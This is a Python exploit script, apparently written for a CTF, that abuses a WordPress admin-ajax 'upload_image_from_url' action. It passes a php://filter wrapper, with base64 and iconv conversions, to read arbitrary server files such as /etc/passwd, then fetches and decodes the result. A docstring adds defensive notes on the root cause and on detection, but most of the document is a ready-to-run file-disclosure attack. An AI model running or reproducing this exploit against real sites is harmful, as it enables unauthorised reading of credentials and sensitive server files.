import sys
import requests
import base64
import urllib.parse


def leak(url, path, out_file=None):
    """Read a server-side file through a URL-fetching upload action and print or save it.

    Sends one POST to ``{url}/wp-admin/admin-ajax.php`` with
    ``action=upload_image_from_url`` and a ``url`` field that names a
    ``php://filter`` stream wrapper around ``path`` instead of a remote
    image. On an ``"OK"`` status, the JSON ``response`` field is treated
    as a URL, fetched, stripped of NUL bytes and base64-decoded.

    Args:
        url: Base URL of the site; the admin-ajax path is appended as-is.
        path: Server-side file path placed in the wrapper's ``resource=``.
        out_file: Optional local path for the decoded bytes. When omitted,
            the bytes are decoded as text and printed.

    Defensive notes (review):
        * No cookie, nonce or credential is sent by this script, so it only
          works where the handler accepts the action without them.
        * Root cause is on the server: a fetch-by-URL handler that accepts
          arbitrary schemes. It should allow only ``http``/``https``, reject
          stream wrappers, and check the fetched content, not only its type.
        * Detection: POSTs to ``admin-ajax.php`` with this ``action`` whose
          ``url`` field (possibly percent-encoded) starts with ``php://``.
    """
    # The wrapper chain base64-encodes the file, then converts it with iconv.
    # NOTE(review): presumably the iconv step is what lets the result pass the
    # WBMP type named in "accepted_files"; the NUL bytes are stripped below.
    wrapped = f"php://filter/convert.base64-encode/convert.iconv.utf-16be.utf-32be/resource={path}"
    form = {
        "action": "upload_image_from_url",
        "url": urllib.parse.quote(wrapped),
        "id": 1,
        "accepted_files": ",image/vnd.wap.wbmp",
    }

    # verify=False turns off TLS certificate checking for this POST only;
    # the follow-up GET below uses the library default.
    reply = requests.post(f"{url}/wp-admin/admin-ajax.php", data=form, verify=False).json()

    if reply["status"] != "OK":
        print(f'Got error {reply["response"]}')
        print("Maybe the file does not exist?")
        return

    # The server answers with the location of the stored "image".
    stored = requests.get(reply["response"]).content
    leaked = base64.b64decode(stored.replace(b"\0", b""))

    if out_file is None:
        print(leaked.decode())
        return

    with open(out_file, 'wb') as sink:
        sink.write(leaked)


if __name__ == "__main__":
    argc = len(sys.argv)
    if argc in (3, 4):
        # The optional third argument is the local output file.
        leak(sys.argv[1], sys.argv[2], sys.argv[3] if argc == 4 else None)
    else:
        print(f"Usage: {sys.argv[0]} URL FILE_TO_LEAK [OUT_FILE]")
        print(f" Example: {sys.argv[0]} http://vulnsite.ctf:80/wp/ /etc/passwd")